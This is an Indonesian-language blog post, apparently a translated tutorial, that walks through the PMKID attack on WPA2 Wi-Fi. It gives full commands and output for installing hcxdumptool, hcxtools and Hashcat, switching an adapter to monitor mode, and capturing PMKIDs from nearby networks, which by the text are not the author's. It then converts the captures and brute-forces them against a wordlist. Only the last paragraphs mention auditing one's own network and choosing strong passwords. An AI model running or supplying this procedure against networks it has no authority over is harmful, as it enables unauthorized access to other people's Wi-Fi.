Popular Post

Popular Posts

Recent post

 

Memecahkan kata sandi untuk jaringan WPA2 kira-kira sama selama bertahun-tahun, tetapi serangan yang lebih baru membutuhkan lebih sedikit interaksi dan info daripada teknik sebelumnya dan memiliki keuntungan tambahan karena dapat menargetkan titik akses tanpa ada yang terhubung. Serangan terbaru terhadap PMKID menggunakan Hashcat untuk memecahkan kata sandi WPA dan memungkinkan peretas menemukan jaringan dengan kata sandi yang lemah dengan lebih mudah.

Cara Lama untuk Memecahkan Kata Sandi WPA2

Cara lama untuk memecahkan WPA2 telah ada cukup lama dan melibatkan pemutusan perangkat yang terhubung untuk sementara dari titik akses yang ingin kami coba retas. Itu memiliki dua kelemahan, yang penting untuk dipahami oleh peretas Wi-Fi.

Kelemahan pertama adalah persyaratan bahwa seseorang terhubung ke jaringan untuk menyerangnya. Kata sandi jaringan mungkin lemah dan sangat mudah dipecahkan, tetapi tanpa perangkat yang terhubung untuk memulai sebentar, tidak ada kesempatan untuk menangkap jabat tangan, sehingga tidak ada kesempatan untuk mencoba membobolnya.

Kelemahan kedua dari taktik ini adalah bahwa ini berisik dan mengganggu secara hukum karena memaksa Anda untuk mengirim paket yang dengan sengaja memutuskan pengguna resmi untuk layanan yang mereka bayar untuk digunakan. Jenis gangguan tidak sah ini secara teknis merupakan serangan penolakan layanan dan, jika dipertahankan, setara dengan mengganggu jaringan. Ini bisa membuat Anda mendapat masalah dan mudah dideteksi oleh beberapa panduan kami sebelumnya.

Metode Baru untuk Memecahkan Kata Sandi

Daripada mengandalkan penyadapan komunikasi dua arah antara perangkat Wi-Fi untuk mencoba memecahkan kata sandi, penyerang dapat berkomunikasi langsung dengan titik akses yang rentan menggunakan metode baru. Pada 4 Agustus 2018, sebuah posting di forum Hashcat merinci teknik baru yang memanfaatkan serangan terhadap RSN IE (Elemen Informasi Jaringan Keamanan Kuat) dari satu frame EAPOL untuk menangkap informasi yang diperlukan untuk mencoba serangan brute force.

Mirip dengan serangan sebelumnya terhadap WPA, penyerang harus berada di dekat jaringan yang ingin mereka serang. Tujuannya adalah untuk menggunakan adaptor jaringan nirkabel yang kompatibel dengan Kali untuk menangkap informasi yang diperlukan dari jaringan untuk mencoba memaksa kata sandi. Daripada menggunakan Aireplay-ng atau Aircrack-ng, kami akan menggunakan alat serangan nirkabel baru untuk melakukan ini yang disebut hcxtools .

Menggunakan Hcxtools & Hashcat

Hcxdumptool dan hcxpcaptool adalah alat yang dibuat untuk audit Wi-Fi dan pengujian penetrasi, dan keduanya memungkinkan kami berinteraksi dengan jaringan Wi-Fi terdekat untuk merekam jabat tangan WPA dan hash PMKID. Ia bekerja mirip dengan Besside-ng karena membutuhkan argumen minimal untuk memulai serangan dari baris perintah, dapat dijalankan terhadap target atau target kenyamanan tertentu, dan dapat dijalankan dengan cepat melalui SSH pada Raspberry Pi atau perangkat lain tanpa layar.

Setelah PMKID ditangkap, langkah selanjutnya adalah memuat hash ke Hashcat dan mencoba memecahkan kata sandi. Di sinilah hcxtools berbeda dari Besside-ng, di mana langkah konversi diperlukan untuk menyiapkan file untuk Hashcat. Kami akan menggunakan hcxpcaptool untuk mengonversi file PCAPNG kami menjadi satu yang dapat digunakan oleh Hashcat, hanya menyisakan langkah memilih daftar kata sandi yang kuat untuk upaya paksa Anda.

Perlu disebutkan bahwa tidak setiap jaringan rentan terhadap serangan ini. Karena ini adalah bidang opsional yang ditambahkan oleh beberapa pabrikan, Anda seharusnya tidak mengharapkan kesuksesan universal dengan teknik ini. Apakah Anda dapat menangkap PMKID tergantung pada apakah produsen titik akses mendukung Anda untuk menyertakan elemen yang menyertakannya, dan apakah Anda dapat memecahkan PMKID yang diambil tergantung pada apakah kata sandi yang mendasarinya terdapat dalam daftar kata sandi brute force Anda . Jika salah satu kondisi tidak terpenuhi, serangan ini akan gagal.

Yang Anda Butuhkan

Untuk mencoba serangan ini, Anda harus menjalankan Kali Linux dan memiliki akses ke adaptor jaringan nirkabel yang mendukung mode monitor dan injeksi paket. Kami memiliki beberapa panduan tentang memilih adaptor jaringan nirkabel yang kompatibel di bawah ini.

Selain dari adaptor jaringan yang kompatibel dengan Kali , pastikan Anda telah sepenuhnya memperbarui dan meningkatkan sistem Anda. Jika tidak, beberapa paket mungkin kedaluwarsa dan menyebabkan masalah saat pengambilan.

Langkah 1Instal Hxctools & Hashcat

Pertama, kami akan menginstal alat yang kami butuhkan. Untuk mengunduhnya, ketik berikut ini ke dalam jendela terminal.

~# git clone https://github.com/ZerBea/hcxdumptool.git

Cloning into 'hcxdumptool'...
remote: Enumerating objects: 133, done.
remote: Counting objects: 100% (133/133), done.
remote: Compressing objects: 100% (97/97), done.
remote: Total 2127 (delta 82), reused 76 (delta 36), pack-reused 1994
Receiving objects: 100% (2127/2127), 759.53 KiB | 1.79 MiB/s, done.
Resolving deltas: 100% (1434/1434), done.

Kemudian, ubah ke dalam direktori dan selesaikan penginstalan dengan make lalu make install .

~# cd hcxdumptool
~/hcxdumptool# make

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto

~/hcxdumptool# make install

cc -O3 -Wall -Wextra -std=gnu99  -o hcxpioff hcxpioff.c
cc -O3 -Wall -Wextra -std=gnu99  -o hcxdumptool hcxdumptool.c  -lcrypto
install -m 0755 -D hcxpioff /usr/local/bin/hcxpioff
install -m 0755 -D hcxdumptool /usr/local/bin/hcxdumptool
rm -f hcxpioff
rm -f hcxdumptool
rm -f *.o *~

Setelah selesai menginstal, kita akan melanjutkan ke menginstal hxctools. Untuk melakukannya, buka jendela terminal baru atau tinggalkan direktori / hexdumptool, lalu instal hxctools.

~/hcxdumptool#cd
~# git clone https://github.com/ZerBea/hcxtools.git

Cloning into 'hcxtools'...
remote: Enumerating objects: 120, done.
remote: Counting objects: 100% (120/120), done.
remote: Compressing objects: 100% (82/82), done.
remote: Total 6196 (delta 77), reused 79 (delta 38), pack-reused 6076
Receiving objects: 100% (6196/6196), 1.89 MiB | 5.02 MiB/s, done.
Resolving deltas: 100% (4320/4320), done.

Selanjutnya, ubah ke direktorinya dan jalankan make and make install seperti sebelumnya. Jika Anda mendapatkan kesalahan, coba ketik sudo sebelum perintah.

~# cd hcxtools
~/hcxtools# make

mkdir -p .deps
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcapngtool.d -o hcxpcapngtool hcxpcapngtool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashtool.d -o hcxhashtool hcxhashtool.c -lcrypto -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpsktool.d -o hcxpsktool hcxpsktool.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxwltool.d -o hcxwltool hcxwltool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancap2wpasec.d -o wlancap2wpasec wlancap2wpasec.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/whoismac.d -o whoismac whoismac.c -lcurl
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpmkidtool.d -o hcxpmkidtool hcxpmkidtool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2john.d -o wlanhcx2john wlanhcx2john.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxpcaptool.d -o hcxpcaptool hcxpcaptool.c -lz -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhashcattool.d -o hcxhashcattool hcxhashcattool.c -lcrypto -lpthread
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxmactool.d -o hcxmactool hcxmactool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxessidtool.d -o hcxessidtool hcxessidtool.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/hcxhash2cap.d -o hcxhash2cap hcxhash2cap.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhc2hcx.d -o wlanhc2hcx wlanhc2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanwkp2hcx.d -o wlanwkp2hcx wlanwkp2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxinfo.d -o wlanhcxinfo wlanhcxinfo.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcx2ssid.d -o wlanhcx2ssid wlanhcx2ssid.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanhcxcat.d -o wlanhcxcat wlanhcxcat.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanpmk2hcx.d -o wlanpmk2hcx wlanpmk2hcx.c -lcrypto
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlanjohn2hcx.d -o wlanjohn2hcx wlanjohn2hcx.c
cc -O3 -Wall -Wextra -std=gnu99  -MMD -MF .deps/wlancow2hcxpmk.d -o wlancow2hcxpmk wlancow2hcxpmk.c

~/hcxtools# make install

install -m 0755 -D hcxpcapngtool /usr/local/bin/hcxpcapngtool
install -m 0755 -D hcxhashtool /usr/local/bin/hcxhashtool
install -m 0755 -D hcxpsktool /usr/local/bin/hcxpsktool
install -m 0755 -D hcxwltool /usr/local/bin/hcxwltool
install -m 0755 -D wlancap2wpasec /usr/local/bin/wlancap2wpasec
install -m 0755 -D whoismac /usr/local/bin/whoismac
install -m 0755 -D hcxpmkidtool /usr/local/bin/hcxpmkidtool
install -m 0755 -D wlanhcx2john /usr/local/bin/wlanhcx2john
install -m 0755 -D hcxpcaptool /usr/local/bin/hcxpcaptool
install -m 0755 -D hcxhashcattool /usr/local/bin/hcxhashcattool
install -m 0755 -D hcxmactool /usr/local/bin/hcxmactool
install -m 0755 -D hcxessidtool /usr/local/bin/hcxessidtool
install -m 0755 -D hcxhash2cap /usr/local/bin/hcxhash2cap
install -m 0755 -D wlanhc2hcx /usr/local/bin/wlanhc2hcx
install -m 0755 -D wlanwkp2hcx /usr/local/bin/wlanwkp2hcx
install -m 0755 -D wlanhcxinfo /usr/local/bin/wlanhcxinfo
install -m 0755 -D wlanhcx2ssid /usr/local/bin/wlanhcx2ssid
install -m 0755 -D wlanhcxcat /usr/local/bin/wlanhcxcat
install -m 0755 -D wlanpmk2hcx /usr/local/bin/wlanpmk2hcx
install -m 0755 -D wlanjohn2hcx /usr/local/bin/wlanjohn2hcx
install -m 0755 -D wlancow2hcxpmk /usr/local/bin/wlancow2hcxpmk

Terakhir, kita perlu menginstal Hashcat, yang seharusnya mudah, karena sudah termasuk dalam repo Kali Linux secara default. Cukup ketikkan yang berikut ini untuk menginstal Hashcat versi terbaru.

~/hcxtools# cd
~# apt install hashcat

Reading package lists... Done
Building dependency tree
Reading state information... Done
hashcat is already the newest version (5.1.0+ds1-1).
The following packages were automatically installed and are no longer required:
  libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1863 not upgraded.

Dengan lengkap ini, kita dapat melanjutkan ke pengaturan adaptor jaringan nirkabel.

Langkah 2Siapkan Adaptor Jaringan Nirkabel

Setelah mencolokkan adaptor jaringan nirkabel yang kompatibel dengan Kali, Anda dapat menemukan nama dengan mengetik ifconfig atau ip a . Biasanya, itu akan diberi nama seperti wlan0. Langkah pertama adalah memasukkan kartu ke mode monitor nirkabel, memungkinkan kita untuk mendengarkan lalu lintas Wi-Fi di area terdekat.

Untuk melakukan ini, ketik perintah berikut ke jendela terminal, menggantikan nama adaptor jaringan nirkabel Anda untuk wlan0.

~# airmon-ng start wlan0

Found 3 processes that could cause trouble
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

 PID Name
 555 NetworkManager
 611 wpa_supplicant
6636 dhclient

PHY     Interface   Driver      Chipset

phy0    wlan0       ath9k       Qualcomm Atheros QCA9565 / AR9565 Wireless Network Adapter (rev 01)

                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
phy1    wlan1       ath9k_htc   Atheros Communications, Inc. AR9271 802.11n

Sekarang, adaptor jaringan nirkabel Anda seharusnya memiliki nama seperti "wlan0mon" dan berada dalam mode monitor. Anda dapat mengonfirmasi ini dengan menjalankan ifconfig lagi.

LANGKAH 3Gunakan Hxcdump untuk Menangkap PMKID dari Jaringan Lokal

Sekarang kami siap untuk menangkap PMKID perangkat yang ingin kami coba serang. Dengan adaptor jaringan nirkabel kami dalam mode monitor sebagai "wlan1mon", kami akan menjalankan perintah berikut untuk memulai serangan.

~# hcxdumptool -i wlan1mon -o galleria.pcapng --enable__status=1

Memecahnya, -i memberi tahu program antarmuka mana yang kita gunakan, dalam hal ini, wlan1mon. Nama file yang akan kita simpan hasilnya dapat ditentukan dengan argumen -o flag. Saluran yang ingin kita pindai dapat ditandai dengan tanda -c diikuti dengan nomor saluran yang akan dipindai.

Dalam perintah kami di atas, kami menggunakan wlan1mon untuk menyimpan PMKID yang diambil ke file bernama "galleria.pcapng." Meskipun Anda dapat menentukan nilai status lain , saya belum berhasil menangkap dengan nilai apa pun kecuali 1 .

warning: NetworkManager is running with pid 555
warning: wpa_supplicant is running with pid 611
warning: wlan1mon is probably a monitor interface

start capturing (stop with ctrl+c)
INTERFACE:...............: wlan1mon
FILTERLIST...............: 0 entries
MAC CLIENT...............: fcc233ca8bc5
MAC ACCESS POINT.........: 10ae604b9e82 (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 62439
ANONCE...................: d8dd2206c82ad030e843a39e8f99281e215492dbef56f693cd882d4dfcde9956

[22:17:32 - 001] c8b5adb615ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:32 - 001] c8b5adb615e9 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:33 - 001] 2c95694f3ca0 -> b4b686abc81a [FOUND PMKID]
[22:17:48 - 011] 14edbb9938ea -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:48 - 011] 88964e3a8ea0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:49 - 011] dc7fa425888a -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:51 - 011] 88964e801fa0 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [EAPOL 4/4 - M4 RETRY ATTACK]
[22:17:57 - 001] 9822efc6fdff -> ba634d3eb80d [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 6696]
[22:18:04 - 011] 803773defd01 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:21 - 011] 14edbb9ba0e6 -> 803773defd01 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 15247]
[22:19:34 - 006] 0618d629465b -> 58fb8433aac2 [FOUND AUTHORIZED HANDSHAKE, EAPOL TIMEOUT 2832]
[22:19:42 - 005] e0220203294e -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:19:57 - 011] 14edbb9ba0e6 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:02 - 008] 14edbbd29326 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:04 - 008] 1c872c707c60 -> 78e7d17791e7 [FOUND PMKID]
[22:20:11 - 009] e0220453a576 -> fcc233ca8bc5 [FOUND PMKID CLIENT-LESS]
[22:20:27 - 001] ace2d32602da -> c8665d5dd654 [FOUND HANDSHAKE AP-LESS, EAPOL TIMEOUT 5202]
INFO: cha=2, rx=32752, rx(dropped)=2801, tx=2205, powned=18, err=0

Jika sudah terkumpul cukup banyak, Anda bisa menghentikan program dengan mengetik Control-C untuk mengakhiri serangan. Ini seharusnya menghasilkan file PCAPNG yang berisi informasi yang kita butuhkan untuk mencoba serangan paksa, tetapi kita perlu mengubahnya menjadi format yang dapat dipahami oleh Hashcat.

LANGKAH 4Gunakan Hxcpcaptool untuk Mengonversi Dump untuk Hashcat

Untuk mengonversi file PCAPNG kami, kami akan menggunakan hcxpcaptool dengan beberapa argumen yang ditentukan. Di folder yang sama dengan file .PCAPNG Anda disimpan, jalankan perintah berikut di jendela terminal.

~# hcxpcaptool -E essidlist -I identitylist -U usernamelist -z galleriaHC.16800 galleria.pcapng

Perintah ini memberi tahu hxcpcaptool untuk menggunakan informasi yang disertakan dalam file untuk membantu Hashcat memahaminya dengan tanda -E , -I , dan -U . The -Z bendera digunakan untuk nama baru file yang dikonversi untuk Hashcat untuk digunakan, dan bagian terakhir dari perintah adalah file PCAPNG kita ingin mengkonversi.

Menjalankan perintah akan menunjukkan kepada kita hal berikut.

summary:
--------
file name....................: galleria.pcapng
file type....................: pcapng 1.0
file hardware information....: x86_64
file os information..........: Linux 4.18.0-kali2-amd64
file application information.: hcxdumptool 4.2.1
network type.................: DLT_IEEE802_11_RADIO (127)
endianess....................: little endian
read errors..................: flawless
packets inside...............: 1089
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 732
beacons (with ESSID inside)..: 49
probe requests...............: 26
probe responses..............: 40
association requests.........: 103
association responses........: 204
reassociation requests.......: 2
reassocaition responses......: 7
authentications (OPEN SYSTEM): 346
authentications (BROADCOM)...: 114
authentications (APPLE)......: 1
EAPOL packets................: 304
EAPOL PMKIDs.................: 21
best handshakes..............: 4 (ap-less: 1)

21 PMKID(s) written to galleriahC.16800

Di sini, kita dapat melihat bahwa kita telah mengumpulkan 21 PMKID dalam waktu singkat. Sekarang kita dapat menggunakan file "galleriaHC.16800" di Hashcat untuk mencoba memecahkan sandi jaringan.

LANGKAH 5Pilih Daftar Kata Sandi & Kekuatan Brute dengan Hashcat

Untuk mulai menyerang hash yang telah kita tangkap, kita harus memilih daftar kata sandi yang baik. Anda dapat menemukan beberapa daftar kata sandi yang bagus untuk memulai di koleksi SecList . Setelah Anda memiliki daftar kata sandi, letakkan di folder yang sama dengan file .16800 yang baru saja Anda ubah, lalu jalankan perintah berikut di jendela terminal.

~# hashcat -m 16800 galleriaHC.16800 -a 0 --kernel-accel=1 -w 4 --force 'topwifipass.txt'

Dalam perintah ini, kami memulai Hashcat dalam mode 16800 , yang untuk menyerang protokol jaringan WPA-PMKID-PBKDF2. Selanjutnya, kami akan menentukan nama file yang ingin kami crack, dalam hal ini, "galleriaHC.16800." Tanda -a memberi tahu kita jenis serangan mana yang akan digunakan, dalam kasus ini, serangan "langsung", dan kemudian tanda -w dan --kernel-accel = 1 menentukan profil beban kerja dengan kinerja tertinggi. Jika komputer Anda mengalami masalah kinerja, Anda dapat menurunkan angka dalam argumen -w .

Selanjutnya, opsi --force mengabaikan peringatan apa pun untuk melanjutkan serangan, dan bagian terakhir dari perintah menentukan daftar kata sandi yang kami gunakan untuk mencoba memaksa PMKID dalam file kami, dalam hal ini, disebut "topwifipass. txt."

hashcat (v4.2.1) starting...

OpenCL Platform #1: The pocl project
====================================
* Device #1: pthread-AMD A8-6410 APU with AMD Radeon R5 Graphics, 2553/2553 MB allocatable, 4MCU

Hashes: 21 digests; 21 unique digests, 20 unique salts

Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Applicable optimizers:
* Zero-Byte
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.

* Device #1: build_opts '-cl-std=CL1.1 -I OpenCL -I /usr/share/hashcat/OpenCL -D VENDOR ID=64 -D CUDA_ARCH=0 -D AMD_ROCM=0 -D VECT_SIZE=4 -D DEVICE_TYPE=2 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=16800 -D _unroll'
Dictionary cache hit:

* Filename..: topwifipass.txt
* Passwords.: 4801
* Bytes.....: 45277
* Keyspace..: 4801

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Bergantung pada kecepatan perangkat keras dan ukuran daftar kata sandi Anda, proses ini membutuhkan waktu yang cukup lama. Untuk melihat status kapan saja, Anda dapat menekan tombol S untuk pembaruan.

LANGKAH 6Interpretasikan Hasil

Saat Hashcat meretas, Anda akan dapat check-in selagi prosesnya untuk melihat apakah ada kunci yang telah dipulihkan.

Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (7 mins, 50 secs)
Time.Estimated...: Sun Oct 28 22:57:50 2018 (17 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.43ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 30180/96020 (31.43%)
Rejected.........: 0/30180 (0.00%)
Restore.Point....: 1508/4801 (31.41%)
Candidates.#1....: peter123 -> moneyman
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: galleriaHC.16800
Time.Started.....: Sun Oct 28 22:32:57 2018 (19 mins, 56 secs)
Time.Estimated...: Sun Oct 28 22:57:54 2018 (5 mins, 3 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      64 H/s (15.24ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/21 (0.00%) Digests, 0/20 (0.00%) Salts
Progress.........: 76736/96020 (79.92%)
Rejected.........: 0/76736 (0.00%)
Restore.Point....: 3836/4801 (79.90%)
Candidates.#1....: monopoli -> mercenary
HWon.Dev.#1......: N/A

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

Ketika daftar kata sandi semakin mendekati akhir, Hashcat akan secara otomatis menyesuaikan beban kerja dan memberi Anda laporan akhir setelah selesai.

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Type........: WPA-PMKID-PBKDF2
Hash.Target......: hotspotcap.16800
Time.Started.....: Sun Oct 28 18:05:57 2018 (3 mins, 49 secs)
Time.Estimated...: Sun Oct 28 18:09:46 2018 (0 secs)
Guess.Base.......: File (topwifipass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#1.....:      42 H/s (15.56ms) @ Accel:1 Loops:1024 Thr:1 Vec:4
Recovered........: 0/2 (0.00%) Digests, 0/2 (0.00%) Salts
Progress.........: 9602/9602 (100.0%)
Rejected.........: 2/9602 (0.02%)
Restore.Point....: 4801/4801 (100.0%)
Candidates.#1....: 159159159 -> 00001111
HWon.Dev.#1......: N/A

Started: Sun Oct 28 18:05:56 2018
Stopped: Sun Oct 28 18:09:49 2018

Jika Anda berhasil memecahkan kata sandi apa pun, Anda akan melihatnya di sini. Dalam uji coba kami, tidak ada PMKID yang kami kumpulkan berisi kata sandi dalam daftar kata sandi kami, sehingga kami tidak dapat memecahkan hash apa pun. Ini kemungkinan besar akan menjadi hasil Anda juga terhadap jaringan mana pun dengan kata sandi yang kuat tetapi berharap untuk melihat hasil di sini untuk jaringan yang menggunakan kata sandi yang lemah.

Serangan Hashcat PMKID Membuat Serangan Wi-Fi Lebih Mudah

Sementara serangan baru terhadap kata sandi Wi-Fi memudahkan peretas untuk mencoba menyerang target, metode yang sama yang efektif terhadap jenis peretasan WPA sebelumnya tetap efektif. Jika jaringan Anda bahkan tidak mendukung elemen keamanan yang kuat yang mengandung PMKID, serangan ini tidak akan berhasil. Anda dapat mengaudit jaringan Anda sendiri dengan hcxtools untuk melihat apakah jaringan rentan terhadap serangan ini.

Bahkan jika jaringan Anda rentan, kata sandi yang kuat masih merupakan pertahanan terbaik terhadap penyerang yang mendapatkan akses ke jaringan Wi-Fi Anda menggunakan ini atau serangan peretas kata sandi lainnya.

Karena serangan ini mengandalkan menebak kata sandi yang digunakan jaringan Wi-Fi, ada dua sumber tebakan yang umum; Yang pertama adalah pengguna memilih sandi default atau sandi yang sangat buruk , seperti "12345678" atau "sandi". Ini akan mudah retak. Sumber kedua dari tebakan kata sandi berasal dari pelanggaran data yang mengungkapkan jutaan kata sandi pengguna sebenarnya . Karena banyak pengguna akan menggunakan kembali kata sandi di antara berbagai jenis akun, daftar ini cenderung sangat efektif dalam membobol jaringan Wi-Fi.

Saya harap Anda menikmati panduan ini untuk serangan Hashcat berbasis PMKID baru pada kata sandi WPA2! Jika Anda memiliki pertanyaan tentang tutorial ini tentang pemecahan kata sandi Wi-Fi atau Anda memiliki komentar, silakan hubungi saya di Twitter @Memek .

- Copyright © PiceXasu - Devil Survivor 2 - Powered by Blogger - Designed by Johanes Djogan -